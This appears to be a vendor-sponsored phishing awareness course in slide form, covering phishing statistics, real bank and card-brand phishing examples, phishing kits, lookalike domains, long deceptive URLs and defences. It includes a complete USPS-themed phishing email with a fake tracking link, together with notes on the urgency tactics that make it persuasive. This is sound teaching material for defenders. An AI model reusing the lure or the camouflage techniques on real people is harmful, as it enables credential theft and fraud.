How To Catch a Phish: User Awareness and Training

How To Catch a Phish: User Awareness and Training
Slide: 1
This online continuing education course is available
through a professional courtesy provided by:
Malcovery Security, LLC
2400 Oxford Drive #302
Bethel Park, PA 15102
Phone: 855-625-2683
Email: sales@malcovery.com
Twitter: @malcovery
Facebook: Malcovery
LinkedIn: Malcovery
Google+: Malcovery
© Concise Courses USA. The material contained in this course was research, assembled, and produced by
Concise Courses USA and remains their property. Questions or concerns about the content of this course
should be directed to the program instructor.
“How To Catch a Phish:
User Awareness and
Training”

Slide: 2
Section 1: The Threat
Section 1
The Threat
Course written by Jeremy Faircloth (CISSP, Security+, CCNA, MCSE, MCP+I, A+)

Slide: 3
1. While phishing is an “old-fashioned” cyber security threat, attacks continue to increase.
Corporations and their customers are continuing to experience phishing and malicious spam attacks. In fact, it’s happening more
than ever before. 37.3 million users experienced phishing attacks in 2013, an increase of over 87% in one year.
2. The stakes are high for cybercrime victims.
Banking/ financial institutions, commerce organizations, universities, etc. are frequent victims of cyber attacks,
which are a form of cybercrime. Remediation costs, and long-term loss of brand loyalty hurt the company’s
bottom line. It is estimated that one of every 200 phishing attacks is successful. The average cost of a phishing
attack is upwards of $150,000 to the organization. Those are significant costs (more on that in the next slide).
3. Traditional methods simply aren’t working.
Despite multiple layers of cybercrime defense and prevention; technologies and services such as end user education and training
about phishing and spam, web filters, web gateway blacklists, take down vendors, aren’t working. Corporations and organizations
continue to experience significant losses to malware, phishing, and other forms of cybercrime.
The reason?
Victims of phishing and malware have not been able to identify who the criminals are, or the scope of the damages they cause.
A Quick Overview of the Problem!

Slide: 4
Cyber Attack Costs: Reputation
1
2
3
Financial
Remediation
Reputation
For every $1 in direct losses
$2.10 in Remediation costs
$6.40 in Reputation costs
Customers are 42% less likely to do business with you if they
are aware of phishing attacks against your brand.“
“Cisco report: Email Attacks: This time it’s Personal

Slide: 5
New “CyberRisk in Banking” study
www.businesswire.com/news/Banks-Lack-Ammo-Fight-Cyberthreats-Report
According to research by the American Banker in 2013, Phishing was found to be “very likely” and also to have a “high impact” for
their organization.

Slide: 6
Phishing Attacks, by the numbers!
APWG Global Phishing Survey 1H2013
The average uptime of a phishing site?
44 hours 39 minutes
The number of targeted brands?
720 brands
“ “
37.3 million users experienced phishing attacks last year
an increase of 87%”
“ “
Kaspersky Lab, June 2013

Slide: 7
Phishing Attacks, by the numbers!
In the second half of 2012
6.8% of all sent email was malware distribution
4.9% of all sent email was phishing distribution
“ “
Microsoft Security Intelligence Report v.14
There was consensus between 250 senior banking executives
that phishing lacked ‘awareness’ – according to 2013 research by
the American Banker.

Slide: 1
Section 2: Phishing Examples
Section 2
Phishing Examples

Slide: 2
Example 1: GoDaddy!
This was a somewhat targeted attack.
The criminals wanted to plant malware on the computers
of known webmasters.
So they sent this email where each recipient saw that his
own domain was going to be terminated.
This is an alarming for many people since no one wants
downtime on their site. The scam then persuades the user
to enter details which are emailed back to the hackers.

Slide: 3
Sometimes you just can’t tell sites apart...spot the difference (if you can!)
Example 2: Bank of Montreal

Slide: 4
Example 3: Canadian Imperial Bank of Commerce
Sometimes you just can’t tell sites apart...spot the difference (if you can!)

Slide: 5
Example 4: Royal Bank of Canada
Here’s a great phishing attack for all the wrong reasons – this Royal Bank of Canada fake page is asking for users to re-activate their
account ‘due to security’ concerns.
To the unsuspecting, this seems very convincing.

Slide: 6
Example 5: HSBC Bank
A good phishing attack will look identical, (most criminals use ‘phishing kits’....more on that later).

Slide: 7
Example 6: American Express
This is a very recent phishing attack that was picked up by the Malcovery Cyber Intelligence & Forensics System. This was a well-
thought phishing campaign and process.
Step 1 of 6
The subject line of the email was
"Fraud Alert: Irregular Card Activity“
The ‘From’ address was
"American Express (fraud@aexp.com)“
The highlighted link that claims it will take you to https://www.
americanexpress.com/ actually goes to one of 419 URLs on one of
57 compromised web servers.
Each of the index.html pages that the victim was sent to was actu-
ally taken to a redirector script that posted a message in a box
that said "Connecting to server“ while it tried to load one of three
JavaScript files from three different locations.

Slide: 8
Example 6: American Express (continued)
Step 2 of 6
Soon afterwards the victim was asked for their user id and password

Slide: 9
Step 3 of 6
Then their Social Security number, birthdate, mother’s maiden name, her birthdate, and a PIN.

Slide: 10
Step 4 of 6
And then of course - the card number...

Slide: 11
Step 5 of 6
And the expiration date...

Slide: 12
Step 6 of 6
And finally the visitor is allocated 5,000 Reward points as a ‘thank-you’ and forwarded to the actual AmEx page.
According to the Malcovery research, to gather the user id’s and password’s of a few hundred American Express card holders, the
phisher was willing and able to break in to SEVENTY web servers ... 57 used in the spam… whilst 10 more were used for JavaScript
Redirection scripts ... and 3 for the actual phishing hosts.
Quite an elaborate scheme and impressive for all the wrong reasons.

Slide: 13
In Summary
So, in summary, the information gathered during a phishing attempt can vary greatly.
Depending on the focus of the attack, the phisher could be looking for account credentials, financial informa-
tion, sensitive corporate information, or even confidential personal information. Phishing attacks for all of
these types of information have been seen “in the wild” and are used to collect information that the attacker
would not otherwise have access to.
This information is then used for a variety of purposes. Personal information from individuals including credit
card data or banking details can be used to commit fraud. An attacker can steal a person’s identity or imper-
sonate them using confidential information such as social security numbers, birth dates, and answers to ques-
tions that could normally be used to authenticate a person’s identity such as their mother’s maiden name. On
a more nefarious front, information gathered during phishing attempts can be used as part of a larger attack
attempt and can be leveraged to further penetrate through a company’s technology-based defenses.
In short, phishing is an attempt to gather data that the phisher is not authorized to have. This data can then
be used for many illicit purposes.

Slide: 1
Section 3: Phishing Methodologies
Section 3
Phishing Methodologies

Slide: 2
Phishing Methodologies
In this section we will be discussing some of the basics associated with phishing to better understand what phish-
ing is, why phishing is performed, and what the attacker can gain by phishing.
Next, we’ll identify some of the targets that can be associated with phishing and how the attacker approaches
those targets.
Phishing techniques will be demonstrated and you’ll see first-hand how easy it is to effectively perform a phishing
attack. Our final section will focus on what you can do about this problem and some techniques that can be used
to combat phishing.

Slide: 3
Benefits to the Phisher
So why would an attacker use Phishing rather than other attack techniques?
To start with, phishing is very easy. Much like traditional fishing with a rod, reel, and hook, phishing attacks can be done with very little effort. All
the phisher has to do is plan out his phishing trip, put together some good bait and all of
his gear, and then see if any phish are biting.
This isn’t even an expensive guided phishing trip with top of the line gear and boats!
Most phishing techniques are performed at a very low cost by using basic techniques,
low-cost technologies, and a little practice. While some traditional attack techniques can
be very expensive to perform, phishing is considered a low-cost, high-return investment.
Many phishing techniques are based on using disposable email addresses, servers, and
domain names. Due to this, the perpetrator of the attack can hide their identity very
effectively. Attempting to gather forensic information about phishing attacks tends to
lead investigators down rabbit holes where the actual attacker is practically impossible
to identify. At most, the characteristics of the attack can be determined and the dispos-
able addresses and other information associated with the attack can be gathered for a
level of future prevention.
Phishing is also very difficult for end-users to detect. With advanced phishing tech-
niques, the messages used or sites shown as part of the attack can look very real. In ad-
dition, other attacks or techniques can be used to make the phishing attack even more
transparent by leveraging real information. We’ll talk about this a little further when we
discuss phishing techniques.
The worst part about phishing from the perspective of those trying to prevent it is
its sheer effectiveness. Phishing simply works. Many security practitioners talk about
creating layered security approaches or defense-in-depth, and these techniques can help
combat traditional attacks very well. However, you can never underestimate the risk that people present to their own information or others. The
most vulnerable part of any organization tends to be its people and they are the true target of phishing attacks.
So what does all of this add up to for the attacker? In business terms, phishing is an excellent value proposition! With low cost, minimal risk, and
high returns, few attack techniques offer the same value to attackers. Consequently, phishing tends to be a favorite technique for many attack-
ers.

Slide: 4
Why is phishing so easy?
• Phishing kits are easily and readily available
• Domain registration takes seconds
• Many sites are easy to exploit
• Every takedown is another opportunity
Phishers create tools and use methods that make it as easy on themselves as possible. Phishing kits exist that are so complete
that all the phisher has to do is set their email address and upload the kit to a new or compromised site.
For new domains, a phisher can register a domain privately in seconds. In fact, these registrations are usually free for the phisher as
they take advantage of the return policies of domain registrars. One notable registrar allows for the return of a domain name if you
change your mind within three days of registering it. Three days is more than enough for a phisher.
Aside from newly registered domains, phishers frequently use existing sites that have been compromised. This allows them to use
the positive reputation rating for the site and simply install their phishing kit somewhere within the site structure. For example, if
WordPress is used, phishers will frequently hide their kit somewhere in the /wp-admin/ directory of the site.
Generally, part of the phishing defense process is to notify the owner of a site that their site has been compromised and is being
used for phishing. However, if the phisher is actually the owner of the site, you’re just telling them that they need to use another
domain now. Effectively, the defense process tells the phisher when they need to change their attack!

Slide: 5
Phishing Kits
• Easy to configure
• Easy to deploy
• Very effective...Usually
Phishing kits help make this type of attack incredibly easy for phishers. They are like being handed a fully stocked tackle box and a
fishing pole with a baited hook already on the line. But what do they look like?
Here is one example of the file contents of a
phishing kit. If you look at the file dates, you’ll
see that a lot of these files are older with minor
modifications over time.
However, the confirm.php file is fairly recent
and is newer than any of the other files in the kit.
That implies that there is configurable data in
that file that needs to be changed when the kit is
deployed.

Slide: 6
Confirm.php
A lot of this file is PHP code associated with the phishing confirmation
page, but if you look at the section in bold, there is an encoded email
address in here too.
This is probably the portion that gets changed prior to the upload of
the kit.
Since it’s a base64 encoded value, we can quickly decode this and
obtain the email address of the phisher.
$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');
Which decodes to: sofotex2@gmail.com

Slide: 7
sofotex2@gmail.com
If we search the Malcovery PhishIQ database, we find that sofotex2@gmail.com was first seen on February 15, 2011 in a Bank of
Montreal kit!
The platform tells us that this individual (or group) used this url: http://conneelybuilders.net/bmo-canada-online/online-cgi-data/

Slide: 8
What does a Phisher (typically) Catch?
• Credentials
• Account Numbers
• Personal Information
• Technical Information
• Financial Information
• Compromised Systems
With phishing being so easy, what does the phisher usually catch?
Phishing kits and sites gather credentials, account numbers, personal infor-
mation such as a mother’s maiden name, technical information about the
target such as their browser information which can be used to fool device
identification processes, financial information, and finally, the compromise
of systems.
With data like this, the phisher can perform identity theft and impersonate
the individual who has been phished. They could open new lines of credit,
access existing financial accounts, and even access their email.
This allows the attacker to send phishing emails to other people that the tar-
get knows from their own account, access any passwords for web sites that
the target has stored in their email account, and hide notifications from the
target’s bank or other sites by deleting the messages before the target sees
them.

Slide: 1
Section 4: Phishing Targets
Section 4
Phishing Targets

Slide: 2
Choosing Targets
Broad Targets
- Randomly Generated Email addresses
- Gathered Email Address Databases
- Verified Email Addresses
Focused Targets
- Company’s Employees
- Company’s Customers
- Geographical Locations
Laser-Focused Targets
- Company Officers
- Specific Individuals
- Highly Selective Criteria
Phishers can use a range of methods for targeting their phish. For email-based phish-
ing attacks, the phishers can use broad techniques to build out email lists that target
thousands of individuals.
This can be done using randomly gener-
ated email addresses, email addresses
that have been gathered through vari-
ous marketing sites, or through email
harvesting.
These broad targeting techniques hit
thousands and thousands of email ad-
dresses daily.
Perhaps you’ve seen some of the exam-
ples on the next few pages?

Slide: 3
Phishing Targets: Examples
Here’s an email from Federal Express. You have
a package coming to you, don’t you?
Perhaps you’d like to get in touch with
some old colleagues through LinkedIn?
And who hasn’t placed an order with Amazon?
All of these examples are real phishing attacks that are sent to broad targets.

Slide: 4
Phishing Targets: Examples continued
In some cases, the phisher is more focused. They will target employees of a specific company or customers of that company. In other cases,
they’ll target a specific geography. This is known as ‘spear-phishing’ or ‘whaling’.
An example of this would be sending emails to all addresses known to be within a certain area that is served by a specific utility provider.
The phisher would send an email purporting to be from that provider to a demographic that is more likely to fall for the attack. It’s like marketing
for bad guys.
Calling all Verizon customers! “My Citi credit card statement doesn’t look right… Let me click
on that to find out what’s wrong.”

Slide: 5
Camouflage
• Falsified Sources
Email Domains
Compromised Web Servers
• Reasonable/Similar Domain Names
• Long URLs
• DNS Hijacking
Most phishers use camouflage to hide from
detection and to keep from being identified. To
do this, a variety of techniques are employed
including falsifying the source of the email
and using compromised web servers. Compro-
mised web servers aren’t just used to host the
phishing kit. They can also be used to send out the phishing emails. This allows for the email to come from a domain that is valid and
may have a good reputation rather than setting off alarms by coming from a recently registered or unusual domain. Here’s a tip… If
you’re running a web server and you don’t send out emails from the site, remove any email functions from the host.
Many times, a phisher will use a domain name that is either reasonable or similar to the real site of the phishing victim. For example,
“myaccountbenefits.com” or “bankofamerica-accountsecurity” seem like reasonable domain names but could be used for phishing.
How about adding an extra character as in “welllsfargo.com” using three “L’s”? Domain names can use extended ASCII characters so
adding an accented vowel can also camouflage a phishing site.

Slide: 6
Long URL’s!
Really long URLs are a favorite for phishers. Consider the above URL...
If, as a normal user, you have a slight degree of heightened awareness, you might take a look at the URL to ensure that it’s what you’re expecting.
At first glance, it looks like a PayPal URL with some normal passing of variable data. What most users won’t see is that the actual domain name is
all the way in the middle of this long string.
While the normal advice that security practitioners give is for the user to hover over the URL and see what
domain pops up, this isn’t nearly as easy on mobile devices or tablets. Using a long URL like this is incredibly ef-
fective for phishing.
The last camouflage technique that we’ll talk about is DNS hijacking. This has been seen in a few different types
of attacks recently and can be very effective.
Two primary methods of performing DNS hijacking are to modify the target’s DNS settings in some way or
modify the DNS settings for a target site with their domain registrar directly.
The first method is usually performed using some form of malware or remote access to the target system. The
second is more effective with standard phishing attacks and makes use of vulnerabilities in the verification systems of domain registrars or com-
promised administrator’s systems.
For example, if a phisher manages to get malware on a site administrator’s system, they could obtain credentials for the domain registrar, modify
the DNS settings for the site’s domain, and use DNS hijacking to forward any requests to the site over to their phishing page.
http://paypal.com.ogi-bin.webscr.cmd-flowers.chmod-login.30934836349034713461359135135webapps8mmp6r7r1paypal.cediapvenezuela.
com/websc/update.php?cmd=_loginsubmit&dispatch=93750148177318734n31nd7as6asbasba7743434ndasd6556sad5as=03418asd6asd6asd
hasd5

Slide: 7
The Victims...
• Financial Impact
• Fraud Loss
• Remediation Costs
• Reputation Impact
• Loss of Business
• Loss of Credibility
As a victim, there are obviously a number of impacts to the targeted organization.
In the financial arena, it’s pretty common to consider the costs associated with loss due to fraud
and the cost to remediate issues. For example, the company that has been phished may have to
pay for identity theft protection for customers who fell victim to the phishing attempts.
There is also a substantial loss to a company’s reputation when they’re phished. This can
lead to a loss of business further impacting the financial outlook for the company as well as a
loss of credibility. Let’s look at some numbers associated with this.
As discussed earlier, based on a recent report from Cisco, the costs for a successful phishing
attack break down into categories of direct financial impact, remediation costs, and reputation
costs.
This forms a pyramid with costs associated as shown in this slide. So as you look at impacts, per
the Cisco report, every dollar of direct financial impact (1 on the chart) values out at $9.50 in
total costs when taking into account remediation (2) and the impact to reputation (3).
1
2
3

Slide: 8
The Victims...an example: South Carolina Government Agency
Customers less likely to do business with a company if they have heard about phishing attacks against that company. Let’s take a
look at an example from a different angle.
In 2012, a breach occurred in a South Carolina government agency. The time line of the breach is shown in this slide.
From a financial perspective, please take a look at the text in red. All other considerations aside, just paying for the identity theft
protection for affected individuals has cost over 12 million dollars so far. This is from a single phishing attack.
• August 13, 2012 Department of Revenue employee opens a phishing email.
• August 27, 2012 Hacker logs in via Citrix VPN using phishing victim’s credentials
• August 29, 2012 Hacker runs utilities to steal passwords from six servers
• September 2-4, 2012 Hacker runs reconnaissance on 21 servers
• September 12, 2012 Hacker dumps data to a staging directory
• September 13-14, 2012 74.7 Gigabytes of data exfiltrated by hackers
• October 10, 2012 State learns of breach, from US Secret Service
• October 26, 2012 Breach disclosed to public
So far, 1 million residents have signed up for Credit monitoring at a cost of $12 Million to the state

Slide: 1
Section 5: Performing Phishing Attacks
Section 5
Performing Phishing Attacks

Slide: 2
Tossing Bait
• Used to target large groups of individuals
• Requires simple email address harvesting or generation
• Uses many emails with the hope that a small percentage will
yield positive results
For this demonstration, we’ll use the “tossing bait” technique. Ba-
sically, a large number of email addresses are gathered and we’ll
send a phishing email out to all of them.
The goal here is to hit as many people as possible and rely on the
large number of emails sent to compensate for the relatively low
success rate on a percentage basis.

Slide: 3
Tossing Bait Demonstration
1
2
3
Target: Verified Email Addresses
Bait: Package Delivery
Cast: Email with Web Site Link
For our phishing campaign, we’ll set it up to use verified email ad-
dresses as a target destination. For bait, why not tell our phish that
we have a package for them?
And we’ll cast this out with a link to a website where we can har-
vest their information.

Slide: 4
Tossing Bait Email
Dear Customer,
We attempted to deliver your item at 10:16 am on Oc-
tober 24, 2012 and a notice was left. You may arrange
redelivery by clicking the link below or pick up the item
at the Post Office indicated on the notice.
If this item is unclaimed after 15 days then it will be re-
turned to the sender. The sender has requested that you
receive a Track & Confirm update, as shown below.
Label Number: 7007 3795 0147 6588 4478
Expected Delivery Date: October 24, 2012
Service Type: First-Class
Certified Mail Service(s): Delivery
Confirmation Status: Final Notice
To check the status of your mailing or arrange redeliv-
ery, please visit http://www.usps.com.usg3o1.com/ship-
ping/trackandconfirm.php?navigation=1&respLang=Eng
&resp=10242012
Regards!
Here’s the email that we’ll use.
We’ll include a date so that it seems relevant.
We’ll design in a sense of urgency by indicating that there
are only 15 days to respond, and we’ll add some other details
such as a label number to make this appear legitimate.
There are actually a lot of psychological elements that go
into the design of a good phishing email.
By appealing to some of the base instincts of people such as
developing a sense of urgency, appearing to give them some-
thing that they want, and making them believe the legitima-
cy of something that they want to believe, the success rate
of phishing attempts increases.

Slide: 5
Tossing Bait Results
Of the 9,116 visitors who actually downloaded malware from the malicious URL, those
who were using webmail clients left “referrer” tags.
• 764 Yahoo webmail users
• 275 Live.com (Microsoft) webmail users
• 174 AOL webmail users
• 36 Comcast, 19 Verizon, 14 Earthlink, 12 Roadrunner, 6 Charter, 4 Juno
Who was infected with the malware?
• 10 U.S. Federal and many State governments agencies
• 231 Canadian IP addresses (though 132 were RIM/BlackBerry)
• 59 different Universities and Colleges
• 9 banks (up to 19 IPs!) 3 brokerages (one had 10 IPs!)
• Energy companies (one had 17 downloads!)
• Airlines, Beverage companies, Chemical companies, Cruiselines, Defense Contractors,
Hospitals, Newspapers, Professional sports teams, Publishers, Retail department stores, Silicon valley companies, Theme
parks
• 7,000+ users from 59 major ISPs
• – 14 of them had from 100 – 973 users infected
For this particular attack, we can get a pretty good idea of what the results will be. Why? Because this was an actual attack per-
formed in 2012 against the United States Postal Service. A very thorough analysis of the web server host used for this revealed
the web server logs. From that, the data on this slide was able to be derived.
This data is very telling… Many of the systems who downloaded the malware weren’t able to detect it even though it was using
Zeus, a commonly used malware kit. Many of these systems also have URL filters to help prevent phishing, but this URL was not
blocked. The email providers didn’t help either as they did not detect this as spam. Overall, a very effective campaign.

Slide: 6
There are Plenty of Phish in the Sea!
The average uptime of a phishing site?
• 44 hours 39 minutes
• The number of targeted brands?
• 720 brands
(APWG Global Phishing Survey 1H2013)
37.3 million users experienced phishing attacks last year “an increase of 87%”
• In the second half of 2012
• 6.8% of sent email was malware distribution
• 4.9% of sent email was phishing distribution
• Source: Microsoft Security Intelligence Report v.14
(Kaspersky Lab, June 2013)
We have already seen these stats, but just as a reminder, look at the figures...
Seeing the research from APWG and Kaspersky Lab we can see that phishing is prolific, increasing in frequency, and obviously still
very effective. Current defenses aren’t working well enough and this problem is not going away.
When a phishing site is only up for less than two days, how do you react fast enough to block the URL? With the number of brands
targeted, how do you protect yours? With the number of users attacked increasing and the sheer volume of phishing and malware
emails being sent, how do you keep users safe?

Slide: 1
Section 6: Preventions + Solutions
Section 6
Preventions + Solutions

Slide: 2
Simple things...
Lets just start by the real simple stuff to tell our staff members and colleagues – i.e. the simple DIY stuff. Ways to avoid phishing
scams include, for example:
1. Guarding against email spam
2. If in doubt communicate personal information only via phone or secure web sites - i.e. look for HTTPS - as a minimum
3. Do not click on links, download files or open attachments in emails from unknown senders
4. It is best to open attachments only when you are expecting them and know what they contain, even if you know the sender.
5. Protect your computer with a firewall, spam filters, anti-virus and anti-spyware software. Do some research to ensure you are get-
ting the most up-to-date software, and update them all regularly to ensure that you are blocking from new viruses and spyware.
Client-based anti-phishing programs are another ‘norm’ when it comes to phishing defense. Email clients are many and include for
example avast!, Avita, ESET Smart security, McAfee etc.

Slide: 3
What Doesn’t Work?
Phishing prevention using traditional techniques does not work
• Manual Blacklisting
• DNS Blocking
• Phisher Identification
We already know things that don’t work. Manual blacklisting of URLs is
too slow to be effective. DNS blocking has the same problem. Traditional
techniques like this simply don’t move fast enough to handle the volume
and rapid pace of phishing attempts today.
As we’ve already discussed, emailing the owner of a domain can be not
only ineffective, but serve as a warning to the phisher that it’s time to
move to a new domain name. And manually digging through data to try to
identify a phisher is slow, arduous, and rarely effective because you only
have the information that you’ve been able to gather.
That typically doesn’t give you enough information to identify attacks that might be able to be identified by aggregating informa-
tion from other companies being phished.

Slide: 4
What Does Work?
Valid Countermeasures
• Using Intelligence
• Shared Knowledge
• Automatic Responses
• Malware Analysis Results
• Internal Scanning
The best defense against phishing is to use the same valuable item that phishing at-
tempts to gather, i.e. information.
By gathering intelligence on phishing attempts and taking appropriate actions, you can
save the phish as much as possible. But it requires different intelligence gathering than
has been commonly used in the past. You need aggregated information from phishing attempts associated with your company as
well as others. You need to be able to be able to automatically respond to trends found in that aggregated data.
You need to have data available that identify email subjects, hostile URLs, hostile attachments, analysis of the actions performed
by the malware used directly and any additional malware dropped or used by the attack, and to be able to combine all of this intel-
ligence with your own internal scanning results.

Slide: 5
What Does Work?
Educate, educate, educate!
• Teach your employees
• Teach your customers
Finally, one of the best non-technical defenses is education. You need to teach others in
your organization about phishing and about its impact.
This education needs to be given to every employee so that they know what phishing is
and how dangerous it can be. In addition, teach your customers about phishing! When
phishing emails are circulating about your brand, make sure that your customers are aware
of them and that phishing targets everyone, not just your company.
Your customer’s perception of your company is a major factor of your reputation and by educating your customer, you can help main-
tain a positive reputation. Using this, the next time your customer gets attacked with a phishing attempt targeting your brand, they
can correctly blame the phisher, not you.

Slide: 6
What Does Work?
Preventing Vulnerabilities Being Exploited (of course!)
Firm up defences against:
• Password brute-forcing
• Vulnerable applications
• Failure to patch websites
Web application vulnerability scanning tools like Acunetix, OpenVAS, Nikto, Nessus or
Qualys will help with understanding possible vulnerabilities but wont do very much to
flag possible phishing attacks.
Web scanning tools will help prevent a web server becoming a phishing springboard,
but they wont fix or ease phishing attacks.

Slide: 7
Malcovery: Cyber Intelligence & Forensics System Architecture
The Malcovery Cyber Intelligence & Forensics System Ar-
chitecture is a cloud-based software and services technology
which works off the Malcovery Threat Database.
This database receives feeds from various proprietary and pub-
lic sources - these create the data from which the intelligence
and forensic activities are based. One part of the process: The
Malcovery Spam Data Mine - has the technology to analyze ap-
proximately one million emails per day and to extract, count,
and de-duplicate any new URLs which are scanned and indexed.
The current collection of over 500 million spam emails and gath-
ers more than one million emails per day - therefore allowing
the platform to respond to queries about a wide range of email-
based crimes, and build unique intelligence reports and data.
Because phishing emails are generated programmatically, the
emails can be processed with tools. The Malcovery platform
auto-classifies about 65% of the scanned phishing URLs, which
means that within seconds of seeing the URL for the first time,
the system has fetched, confirmed, and assigned a brand to the
URL. URLs which cannot be automatically classified are pre-
sented to the Operations Team for human classification. When
a phish attack is classified , the pattern is learned by the system
automatically, and can be matched upon in the future. When the Operations Team confirms a phish and labels it with a brand, that pattern be-
comes part of a collection of “known phishing patterns” stored in the MCIF database.

Slide: 8
“Phishing kit” duplication prevention
As we discovered most phishing sites are created by uploading, and then unpacking, a “phishing kit” which is typically a zipped folder
contains the contents of the websites.
The Malcovery solution “hashes” each HTML, JPG, CSS, GIF, JS, etc that constitutes the fake website.
Their Phishing Intelligence system can very quickly and reli-
ably determine if a NEW site matches a previously learned
pattern and therefore find identical scams in the wild. This
helps, of course, to protect your brand or clients brand.

Slide: 9
One of these things is not like the others...
Through analysis of more than 550,000 confirmed phishing sites, the Malcovery PhishIQ System has become very good at determin-
ing which things belong together.
Being able to detect phishing activity and presence can be tedious at best and difficult at all times. Malcovery offer a solution
through their PhishIQ technology which analysises more than 550,000 confirmed phishing sites and has identified hundreds of thou-
sands of patterns that alert clients to phishing risks.

Slide: 10
Kits have predictable paths
Phishing Kits have predictable paths.
For example, when we unzip a file, it places
its contents based on the directory struc-
ture in the ZIP file.
So, “/cibadministrator/index.htm” is likely
from one kit, while “/cibc/cibc/PreSignOn.
cibc.htm” is from another, and “/cibonline/”
and “/cibc.com/” are likely from others so
phishing kits.
Since phishing kits are very common pattern
detection software acts as the most robust
methodology to protect clients from phish-
ing attacks.
The Malcovery PhishIQ receives tens of thousands of potentially harmful phishing sites
per day. Each of these is retrieved, evaluated, “branded,” and clustered in real-time.
Malcovery PhishIQ

Slide: 11
“wp-admin”
A number of vulnerabilities, configuration errors, and poor password choices make WordPress sites very easy to compromise. In
fact, one of the most common paths seen in both phishing and malware sites is “wp-admin” – something which the Malcovery Intel-
ligence & Forensics (MCIF) System Architecture is very good at detecting.

Slide: 1
Section 7: Summary
Section 7
Summary

Slide: 2
Section 7: Summary
In Summary
• Traditional protection techniques are ineffective
• Phishing is easy and effective
• Phishing gathers information that can be used for a variety of purposes
• A variety of techniques are used to phish and camouflage the phisher
• Intelligence gathering, automated response, and education are the best defenses against phishing
The last ‘take away’ three points are these:
While phishing is an “old-fashioned” cyber security threat, attacks continue to increase.
Corporations and their customers are continuing to experience phishing and malicious spam attacks. In fact, it’s happening
more than ever before. 37.3 million users experienced phishing attacks in 2013, an increase of over 87% in one year.
The stakes are high for cybercrime victims.
Banking/financial institutions, commerce companies, universities, etc are frequent victims of cyber attacks, which are a
form of cybercrime. Remediation costs, and long-term loss of brand loyalty hurt the company’s bottom line. It is estimated
that one of every 200 phishing attacks is successful. The average cost of a phishing attack is upwards of $150,00 to the orga-
nization. Those are significant costs.
Traditional methods simply aren’t working.
Despite multiple layers of cybercrime defense and prevention; technologies and services such as end user education and
training about phishing and spam, web filters, web gateway blacklists, take down vendors, aren’t working. Corporations
and organizations continue to experience significant losses to malware, phishing, and other forms of cybercrime. The
reason? Victims of phishing and malware have not been able to identify who the criminals are or the scope of the damages
they cause.

How To Catch a Phish: User Awareness and Training

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to How To Catch a Phish: User Awareness and Training

Similar to How To Catch a Phish: User Awareness and Training (20)

More from London School of Cyber Security

More from London School of Cyber Security (17)

Recently uploaded

Recently uploaded (20)

How To Catch a Phish: User Awareness and Training